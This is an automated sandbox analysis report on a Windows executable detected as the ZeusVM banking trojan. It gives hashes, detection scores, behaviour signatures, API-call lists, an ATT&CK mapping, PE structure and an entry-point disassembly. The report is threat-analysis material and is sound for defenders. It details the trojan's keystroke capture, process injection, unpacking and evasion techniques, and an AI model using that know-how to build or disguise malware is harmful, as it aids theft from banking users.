Play interactive tour

Edit tour

Analysis Report GqSL8M2a72

Overview

General Information

Sample Name:	GqSL8M2a72 (renamed file extension from none to exe)
Analysis ID:	355735
MD5:	4fc29198fcc9a9fe3b31f7549d54d8e9
SHA1:	5b112c77ea208d570eedaad0d5880e6fc19cffbc
SHA256:	98d8b13f297953a0b4f915e55cd527f0f1461d42b917b77aa99f05446f6fdd12
Tags:	uncategorizedZeuS
Most interesting Screenshot:

Detection

ZeusVM

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

May initialize a security null descriptor

Program does not show much activity (idle)

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

GqSL8M2a72.exe (PID: 1832 cmdline: 'C:\Users\user\Desktop\GqSL8M2a72.exe' MD5: 4FC29198FCC9A9FE3B31F7549D54D8E9)

GqSL8M2a72.exe (PID: 5864 cmdline: 'C:\Users\user\Desktop\GqSL8M2a72.exe' MD5: 4FC29198FCC9A9FE3B31F7549D54D8E9)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: GqSL8M2a72.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: GqSL8M2a72.exe	Virustotal: Detection: 86%	Perma Link
Source: GqSL8M2a72.exe	Metadefender: Detection: 72%	Perma Link
Source: GqSL8M2a72.exe	ReversingLabs: Detection: 88%

Machine Learning detection for sample

Show sources

Source: GqSL8M2a72.exe

Joe Sandbox ML: detected

Source: 2.2.GqSL8M2a72.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK
Source: 1.2.GqSL8M2a72.exe.5e0000.1.unpack	Avira: Label: TR/Kazy.MK

Cryptography:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 1_2_00401145 HeapAlloc,CryptStringToBinaryA,	1_2_00401145
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0040A14E CryptUnprotectData,LocalFree,	2_2_0040A14E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041764D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	2_2_0041764D

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack

Uses 32bit PE files

Show sources

Source: GqSL8M2a72.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Spreading:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0040969D GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

2_2_0040969D

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041BA18 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		2_2_0041BA18
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041BAD3 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		2_2_0041BAD3

Networking:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00406095 getaddrinfo,freeaddrinfo,getsockname,getpeername,recv,recvfrom,getaddrinfo,freeaddrinfo,sendto,recvfrom,sendto,select,

2_2_00406095

Source: GqSL8M2a72.exe	String found in binary or memory: http://www.google.com/webhp
Source: GqSL8M2a72.exe, 00000001.00000002.197226170.000000000265E000.00000004.00000040.sdmp	String found in binary or memory: http://www.google.com/webhpLb
Source: GqSL8M2a72.exe, 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp	String found in binary or memory: http://www.google.com/webhpbc

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00405EC6 GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

2_2_00405EC6

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00405D60 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

2_2_00405D60

Source: GqSL8M2a72.exe, 00000001.00000002.197104411.000000000068A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0040DB94 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,

2_2_0040DB94

Protection of GUI:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00404C67 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

2_2_00404C67

System Summary:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 1_2_00401326 NtAllocateVirtualMemory,	1_2_00401326
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 1_2_0042656B NtAllocateVirtualMemory,	1_2_0042656B
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 1_2_0042694B CreateProcessW,NtGetContextThread,NtUnmapViewOfSection,SetUnhandledExceptionFilter,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,ExitProcess,	1_2_0042694B
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 1_2_0042658E NtSetContextThread,NtResumeProcess,	1_2_0042658E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00415C2E NtQueryInformationProcess,CloseHandle,NtCreateThread,	2_2_00415C2E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00415CE5 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	2_2_00415CE5
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00415781 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,	2_2_00415781

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

2_2_00417CCA

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004120CF InitiateSystemShutdownExW,ExitWindowsEx,		2_2_004120CF
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0040F5BB CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		2_2_0040F5BB

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004190FB	2_2_004190FB
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00417559	2_2_00417559
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00401A63	2_2_00401A63
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00410F8B	2_2_00410F8B

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: String function: 0040101D appears 51 times

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Section loaded: skembuptpwnoq.dll

Jump to behavior

Source: GqSL8M2a72.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: GqSL8M2a72.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal92.bank.troj.evad.winEXE@3/0@0/0

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041D5F1 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		2_2_0041D5F1
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041D766 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		2_2_0041D766

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00417A74 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

2_2_00417A74

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00417A1D CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

2_2_00417A1D

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0040A86D CoCreateInstance,

2_2_0040A86D

Source: GqSL8M2a72.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GqSL8M2a72.exe	Virustotal: Detection: 86%
Source: GqSL8M2a72.exe	Metadefender: Detection: 72%
Source: GqSL8M2a72.exe	ReversingLabs: Detection: 88%

Source: unknown	Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Source: unknown	Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'	Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

2_2_00417CCA

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00401807 push FFFFFFF1h; ret	2_2_00401809
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00401CED push es; iretd	2_2_00401CFC
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004093F2 push esi; iretd	2_2_004093F3
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_00402383 push cs; ret	2_2_00402398
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004023B9 push cs; iretd	2_2_004023C8

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00411779 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

2_2_00411779

Malware Analysis System Evasion:

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041BA18 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		2_2_0041BA18
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_0041BAD3 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		2_2_0041BAD3

Source: GqSL8M2a72.exe

Binary or memory string: O1nvu1ctKOpA7eriBCpw6n8KOmhqynhk5NpS7zt6aKXNOvppepIl6mWFlZ9VmzJrWm5qYtXp1dqSKkm6aK8Vmzcrbmpqbx9S1WWbMGprLmpp1VqSKCp6a+LduuWdG68K5Zs26muC/jZp2OZdOqpqsapqtPoqemuWDjXafAn/umGqki16empi2m46ov4wYt43qmjeNyL9MCL+OmFi3jRo3jfmGq4x4mqCa5EivjOqb2WZNCjuSmL4b7Di/7CiaQt+ampi

Anti Debugging:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00415E14 LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,

2_2_00415E14

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

2_2_00417CCA

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0040E636 mov edx, dword ptr fs:[00000030h]

2_2_0040E636

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 1_2_004015DA HeapCreate,GetProcessHeap,

1_2_004015DA

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 1_2_0042694B CreateProcessW,NtGetContextThread,NtUnmapViewOfSection,SetUnhandledExceptionFilter,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,ExitProcess,

1_2_0042694B

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Memory written: C:\Users\user\Desktop\GqSL8M2a72.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'

Jump to behavior

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_00419997 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

2_2_00419997

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_004164AA GetSystemTime,SystemTimeToFileTime,

2_2_004164AA

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0041D595 GetUserNameExW,

2_2_0041D595

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_004164D2 GetTimeZoneInformation,

2_2_004164D2

Source: C:\Users\user\Desktop\GqSL8M2a72.exe

Code function: 2_2_0040E447 GetVersionExW,GetNativeSystemInfo,

2_2_0040E447

Lowering of HIPS / PFW / Operating System Security Settings:

Source: GqSL8M2a72.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: GqSL8M2a72.exe	String found in binary or memory: RFB 003.003
Source: GqSL8M2a72.exe	String found in binary or memory: RFB 003.003

Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004194EA socket,bind,listen,closesocket,		2_2_004194EA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe	Code function: 2_2_004197C8 socket,bind,closesocket,		2_2_004197C8

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Input Capture21	System Time Discovery2	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Application Shimming1	Application Shimming1	Obfuscated Files or Information2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture21	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Create Account1	Valid Accounts1	Install Root Certificate1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Valid Accounts1	Access Token Manipulation11	Software Packing22	NTDS	System Information Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection111	DLL Side-Loading1	LSA Secrets	Network Share Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation11	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GqSL8M2a72.exe	86%	Virustotal		Browse
GqSL8M2a72.exe	78%	Metadefender		Browse
GqSL8M2a72.exe	88%	ReversingLabs	Win32.Trojan.Zeus
GqSL8M2a72.exe	100%	Avira	HEUR/AGEN.1108096
GqSL8M2a72.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.GqSL8M2a72.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File
2.0.GqSL8M2a72.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108090	Download File
1.0.GqSL8M2a72.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108090	Download File
1.2.GqSL8M2a72.exe.5e0000.1.unpack	100%	Avira	TR/Kazy.MK	Download File
1.2.GqSL8M2a72.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108090	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	355735
Start date:	21.02.2021
Start time:	15:03:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	GqSL8M2a72 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.bank.troj.evad.winEXE@3/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 92.4%) Quality average: 82.2% Quality standard deviation: 29.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.080431308237134
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GqSL8M2a72.exe
File size:	161962
MD5:	4fc29198fcc9a9fe3b31f7549d54d8e9
SHA1:	5b112c77ea208d570eedaad0d5880e6fc19cffbc
SHA256:	98d8b13f297953a0b4f915e55cd527f0f1461d42b917b77aa99f05446f6fdd12
SHA512:	a023c11edff4e1059bb3e22edb53d9774c66b44379c3121b761e9fa276eae42aca7b15b82b45aef4fc829095c2c264728147bb840f36650e4566136a79f6fead
SSDEEP:	3072:sK9smc3K+aCj93AnXGaNkdrgm9nl0JdqFJG2GztR07IVgfXs7ZsFz6x:JfcVho2eaJnl0JoLGtzz074IsYOx
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a.......c.......`.......c...h...\|...a...1.....).`.......`...Richa...................PE..L......<.................^.

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40156c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NO_ISOLATION
Time Stamp:	0x3CAFB40C [Sun Apr 7 02:50:52 2002 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3d72c2249f14f4cc74dd098fd236f98a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 1Ch
push 0042713Ch
call dword ptr [00427024h]
test eax, eax
jne 00007F7554D791E7h
call 00007F7554D79239h
push edi
xor edi, edi
cmp dword ptr [004294ECh], edi
je 00007F7554D79221h
call 00007F7554D78FACh
test eax, eax
je 00007F7554D79218h
push esi
push 004270C4h
call 00007F7554D78C5Dh
mov esi, dword ptr [00427080h]
pop ecx
jmp 00007F7554D791F6h
lea eax, dword ptr [ebp-1Ch]
push eax
call dword ptr [00427088h]
lea eax, dword ptr [ebp-1Ch]
push eax
call dword ptr [00427060h]
push edi
push edi
push edi
lea eax, dword ptr [ebp-1Ch]
push eax
call esi
test eax, eax
jne 00007F7554D791C1h
pop esi
mov eax, dword ptr [00428278h]
pop edi
leave
retn 000Ch
push 004270C4h
call 00007F7554D78C1Eh
pop ecx
push 00000000h
push 0016FCD8h
push 00000000h
call dword ptr [0042702Ch]
mov dword ptr [0042A4F4h], eax
test eax, eax
jne 00007F7554D791F1h
call dword ptr [00427030h]
mov dword ptr [0042A4F4h], eax
test eax, eax
je 00007F7554D791FDh
call 00007F7554D78BEAh
mov eax, dword ptr [eax+30h]
mov dword ptr [004294ECh], eax
test eax, eax
je 00007F7554D791ECh
mov eax, dword ptr [00428278h]
jmp 00007F7554D791E6h
ret
mov eax, dword ptr [004294ECh]
mov eax, dword ptr [eax+10h]
mov ecx, dword ptr [eax+44h]

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x271e0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27000	0xac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x25dc6	0x25e00	False	0.732924659653	data	5.98756571788	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x27000	0x632	0x800	False	0.43115234375	zlib compressed data	4.18800845972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x28000	0x2538	0x400	False	0.626953125	data	4.83990809034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	LocalAlloc, GetModuleHandleA, OutputDebugStringA, lstrcpyA, LoadLibraryA, GetProcAddress, HeapCreate, GetProcessHeap, ExitProcess, SetUnhandledExceptionFilter, HeapAlloc, lstrlenA
USER32.dll	GetActiveWindow, DispatchMessageW, UpdateWindow, SetWindowPos, CreateWindowExA, MessageBoxA, ShowWindow, FindWindowA, MessageBoxW, GetMessageW, SetFocus, TranslateMessage, DefWindowProcW
POWRPROF.dll	GetPwrCapabilities, IsPwrShutdownAllowed, IsPwrHibernateAllowed, GetActivePwrScheme
WINTRUST.dll	WintrustGetRegPolicyFlags
CRYPT32.dll	CryptStringToBinaryA, CertCreateCertificateChainEngine
imagehlp.dll	ImageEnumerateCertificates
WINMM.dll	mciSendStringW
CLUSAPI.dll	ClusterEnum

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

